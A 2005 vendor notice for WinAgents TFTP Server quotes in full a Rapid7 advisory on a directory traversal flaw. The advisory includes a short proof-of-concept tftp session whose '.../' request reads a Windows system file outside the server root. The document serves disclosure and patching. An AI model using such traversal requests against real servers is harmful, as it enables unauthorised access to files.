A new version of WinAgents TFTP Server is available from August 18, 2005. The current version has a number of important updates that increase the safety of your server.
We do all we can to make our software meet all possible requirements of safety and reliability. However, on August 18, 2005 we received a notice from the Rapid7 company (http://www.rapid7.com/) telling about a vulnerability in WinAgents TFTP Server version 3.1. The vulnerability allows an intruder to get access to files outside the root directory of TFTP. Below you can see the entire text of the message reporting about the vulnerability.
WinAgents Software Group has released an update of WinAgents TFTP Server that doesn’t have this vulnerability. You can download the updated version from our site: http://www.winagents.com/downloads/tftpsetup.exe. We strongly recommend that you should install this update to increase the security of your server. This update is free for all registered users.
Please accept our sincere apologies about the inconvenience.
----------------------------
Rapid7 Security Advisory R7-0020
Directory traversal vulnerability in WinAgents TFTP Server for Windows
Date: August 17, 2005
Revision: 0.1 PRE-RELEAESE
http://www.rapid7.com/advisories/R7-0020.html
NOTE: This advisory contains unpublished, confidential information.
Rapid7 will publish this advisory on Monday, Sept. 19, 2005 or when
updated software is released by WinAgents, whichever comes first.
1. Affected system(s):
KNOWN VULNERABLE:
o WinAgents TFTP Server for Windows
v3.0 and earlier
2. Summary
Rapid7 has found a directory traversal vulnerability in WinAgents
TFTP Server for Windows. This vulnerability allows remote users to
download any files outside of the server's TFTP data directory.
3. Vendor status and information
WinAgents Software Group
http://www.winagents.com/en/products/tftp-server/
Vendor was notified on August 18, 2005.
4. Solution
TBD
5. Detailed analysis
TFTP servers are often used to transfer configuration files and
operating system images to routers. TFTP is also used for devices
that support PXE booting.
Most implementations do trivial filtering on requested filenames
such as "../filename" to prevent easy directory traversal.
However, it is easy to bypass this filtering by manipulating the
filename being requested.
With the WinAgents TFTP server, any file on the system can be
downloaded using a request similar to the following:
$ tftp 192.168.0.1
tftp> get .../WINNT/win.ini
Received 582 bytes in 0.1 seconds
tftp> quit
$ cat win.ini
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
...
6. Contact Information
Rapid7 Security Advisories
Email: advisory@rapid7.com
Web: http://www.rapid7.com/
Phone: +1 (310) 316-1235
7. Disclaimer and Copyright
Rapid7, LLC. is not responsible for the misuse of the information
provided in our security advisories. These advisories are a service
to the professional security community. There are NO WARRANTIES
with regard to this information. Any application or distribution of
this information constitutes acceptance AS IS, at the user's own
risk. This information is subject to change without notice.
This advisory Copyright (C) 2005 Rapid7, LLC. Permission is
hereby granted to redistribute this advisory, providing that no
changes are made and that the copyright notices and disclaimers
remain intact.
-----------------------------
